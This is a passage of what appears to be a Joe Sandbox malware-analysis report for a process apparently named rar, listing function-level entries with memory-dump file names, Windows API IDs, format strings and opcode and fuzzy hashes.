                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3659116390-0
                                                                                                                                                                                                                              • Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                              • Instruction ID: 9114f51e69e961a3e0cd5102445f3bc352ab4e4f3d58634d1641aa264f4974a3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1851AE72A14A618AE715CF69D4843AC3BB0BB49B98F188235DF5A87AB9DF3CD541C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 643171463-0
                                                                                                                                                                                                                              • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                              • Instruction ID: 0ea706678e0c2b51c9bdbc44791265b9590ff4db2501b5e6af5852d5e8c10937
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9841F861E08A4252F928DB28E8042BA62A0BF5D7A0F441335EF6D977F6CF3CE545C780
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 190572456-0
                                                                                                                                                                                                                              • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                              • Instruction ID: 933d7e2cdb9d48f7175ff1d03a9ef6977e29a34a5c4558c990ec92361d374989
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E41F361B0EA5295FA299F4AA8046B56291BF0CBD0F0E8735DF5DCB7A4EE3CE4408344
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                              • Instruction ID: 9c132ca5f20de5f5f33801b1c11689febc62860155109a2a091ece7c88b58498
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4611547AE18A2306F65C212DF48637A11437F9D360F1C4B38EB6EC66F6DFACA4404201
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr$BeepMessage
                                                                                                                                                                                                                              • String ID: ($[%c]%ls
                                                                                                                                                                                                                              • API String ID: 1408639281-228076469
                                                                                                                                                                                                                              • Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                              • Instruction ID: b98109206662da3e30741508137960e2537004297d074cc061220da40dcf8269
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5181C522A08A8186EB64CF19E4442BA67B5FB9CB88F540136EF4E97779DF3CE541C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                                                                                                                                                                                              • API String ID: 233258989-622958660
                                                                                                                                                                                                                              • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                              • Instruction ID: d909fecc7851ffad67156ebedf033f028d2ddc17d31c9551f6d41b7d02da30df
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27515DF3F785448AE3548F1CF841BA96660F368B91F545A25F65AD3B94CB3DDA048700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr
                                                                                                                                                                                                                              • String ID: MCAOmcao$MCAOmcao
                                                                                                                                                                                                                              • API String ID: 1497570035-1725859250
                                                                                                                                                                                                                              • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                              • Instruction ID: 660faceb1a673d184fc58643e95e2965d0a385903c3c99a8ac5d85b25efe3be6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D841C512E0C58380F660DB2882596BE5671BF3CB84F684076DB4DC62F6EF3DE45583A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00007FF6BBCD359E
                                                                                                                                                                                                                              • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6BBCD35E6
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF6BBCD305D,?,?,?,?,?,?,?,?,00007FF6BBCE4126,?,?,?,?,00000800), ref: 00007FF6BBCD30F0
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6BBCE4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6BBCD3119
                                                                                                                                                                                                                              • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6BBCD3651
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                                                                                                                                              • String ID: %u.%03u
                                                                                                                                                                                                                              • API String ID: 2814246642-1114938957
                                                                                                                                                                                                                              • Opcode ID: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                              • Instruction ID: 002b90437dbce2740dfb7ab84031ff274a97dfb466e1b8b16df87d20b2928bf4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF314565618A8542EA18DB2CF4152AAA270BB8C7B4F501331EB7E87BF1DF3CE546C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                              • Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                              • Instruction ID: e0011f97e5095b9fb848167e1f8b335a63f731dfe014ace255cf0a6c71d33555
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A41BF62B18A9586EB248F29E8443BAB7A1FB88784F854231EF4D877A4DF3CD445C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2280078643-1018135373
                                                                                                                                                                                                                              • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                              • Instruction ID: 4472206d43b564dc829cae99293f9f0744f59e0b4338d301184eea24bcf84845
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68214F7AA0864186E638DF19E05066E7761FB88BA5F445336DF9D83BA5CF3CE445CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcschr$swprintf
                                                                                                                                                                                                                              • String ID: %c:\
                                                                                                                                                                                                                              • API String ID: 1303626722-3142399695
                                                                                                                                                                                                                              • Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                              • Instruction ID: 0fbcf93390194c678493e20de7c43d42866ad66c1012fd5a6437dea945e3aaec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17115E62A18781C1EE24AF1595060AE6771BF4DB90B588635DF6E937F6DF3CF4618200
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
